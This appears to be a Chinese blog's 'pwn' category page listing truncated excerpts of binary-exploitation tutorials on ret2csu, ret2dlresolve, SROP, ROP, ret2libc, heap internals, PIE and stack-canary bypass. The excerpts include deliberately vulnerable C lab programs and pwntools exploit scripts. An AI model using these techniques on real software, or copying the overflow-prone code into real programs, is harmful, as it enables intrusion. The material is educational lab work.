分类 pwn 中的文章

ret2csu

漏洞程序 #include <stdio.h> int win(int x, int y, int z) { if(z == 0xdeadbeefcafed00d) { puts("Awesome work!"); } } int main() { puts("Come on then, ret2csu me"); char input[30]; gets(input); return 0; } 利用分析 常规利用 溢出控制rip指向gadget gadget负责执行win 利用代码: from pwn import * elf = context.binary = ELF('./vuln') p = process() log.info(f'win addr is : {hex(elf.sym.win)}') offset = 40 rop = ROP(elf) rop.raw(offset * 'a') rop.win(0,0,0xdeadbeefcafed00d) p.recv() p.sendline(rop.chain()) result = p.recvline() log.info(result) 上述代码基于一个假设存在可以构建gadget的情况,但实际情……

阅读全文

ret2dlresolve

概要 利用ret2dlresolve,攻击者可以诱导二进制程序解析一个所选择的函数(比如system)为plt。 动态链接的ELF对象在第一次使用PLT和GOT调用时导入libc函数。在重定位runtime symbol,RIP将跳转到PLT并尝试解析该符号。在这个过程中,一个&quo……

阅读全文

socket exploitation

socket vuln #include <stdio.h> #include <unistd.h> #include <stdlib.h> #include <string.h> #include <netdb.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> void vuln(int childfd) { char buffer[30]; read(childfd, buffer, 500); write(childfd, "Thanks!", 8); } void win() { system("/bin/sh"); } ////////////////////// Socket Stuff /* * error - wrapper for perror */ void error(char *msg) { perror(msg); exit(1); } int main(int argc, char **argv) { int parentfd; /* parent socket */ int childfd; /* child socket */ int portno; /* port to listen on */ int clientlen; /* byte size of client's address */ struct sockaddr_in serveraddr; /* server's addr */ struct sockaddr_in clientaddr; /* client addr */ struct hostent *hostp; /* client host info */ char *hostaddrp; /* dotted decimal host addr string */ int optval; /* flag value for setsockopt */ int n; /* message byte size */ /* * check……

阅读全文

SROP

SROP Sigreturn Oriented Programming (SROP), a novel technique for exploits and backdoors in UNIX-like systems. 具体见[1]。 漏洞程序 vuln程序 from pwn import * context.arch = 'amd64' context.os = 'linux' elf = ELF.from_assembly( ''' mov rdi, 0; mov rsi, rsp; sub rsi, 8; mov rdx, 500; syscall; ret; pop rax; ret; ''', vma=0x41000 ) elf.save('vuln') └─$ cat /usr/include/asm/unistd_64.h | grep -i sigreturn -A2 #define __NR_rt_sigreturn 15 #define __NR_ioctl 16 #define __NR_pread64 17 嵌入shell地址 ┌──(kali㉿kali)-[~/exploits/srop] └─$ echo -en "/bin/sh\x00" >> vuln ┌──(k……

阅读全文

ROP

ROP Returned-oriented Program,defeats the W⊕X protections recently deployed by Microsoft,Intel, and AMD;in this context, it can be seen as a generalization of traditional return-into-libc attacks. But the threat is more general . gadget what gadget Each gadget is an arrangement of words on the stack, both pointers to instruction sequences and immediate data words, that when invoked accomplishes some well-defined task “W⊕X,” ensures that no memory location in a process image is marked both writable (“W”) and executable (“X”) gadget feature One gadget might: perform a load operation another an xor and another a conditional branch 案例程序 from pwn import * context.arch = 'amd64' context.os = 'linux' elf = ELF.from_assembly( ''' mov rdi, 0; mov rsi, rsp; sub rsi, 8; mov rdx,……

阅读全文

heap: chunks and bins

chunks 在x86_64上chunk多加16字节的metadata,x86上多加8字节的meatadata metadata := prev size + size + flags(A,M,P) prev size: 前面相邻chunk被free,则代表前chunk大小 size:代表chunk大小 P(0x01): Previous in Use ,表示前面的chunk是否已分配在使用,P == 0,该chunk之前的chun……

阅读全文

ret2libc

ret2libc 程序开启nx保护时候,传统的shellcode在栈上不可执行,无法获取 执行shell程序,可以用ret2libc技术。 漏洞程序 #include <stdio.h> void vuln() { char buffer[64]; puts("Overflow me"); gets(buffer); } int main() { vuln(); } gcc vuln.c -o -m32 -fno-stack-protector -no-pie vuln-32 └─$ checksec --file=./vuln-32 [*] '/home/kali/exploits/ret2libc/vuln-32' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) 利用方案 eip直接指向system(’/bin/……

阅读全文

pie绕过

pie PIE(Position Independent Executable,可移植执行码)是一种特殊的执行文件格式,常用于保护程序执行空间的受限和安全性。使用 PIE 能够让加载到内存的代码不会固定地映射到特定的地址,每次加载时都能让其他程序更难预测它想要加载到哪里。 代码重定位的例子有:加载时技术(load-ti……

阅读全文

stack canary泄露方法

什么是canary security cookies,Assume that at the beginning of a function call (e.g. during its prologue) we are saving a value in the function’s stack frame, we would expect (! if everything went well !) to read the same value just before the function exits or namely at its epilogue. If the value has changed, then the execution of the program will be terminated and an error message will be displayed. [1] Obviously, this protection mechanism is added by the compiler during the compilation process. For the GNU Compiler Collection (gcc), it is implemented via the StackGuard extension which was added to gcc 2.7.2.2 [1] Bypass stack canary 漏洞程……

阅读全文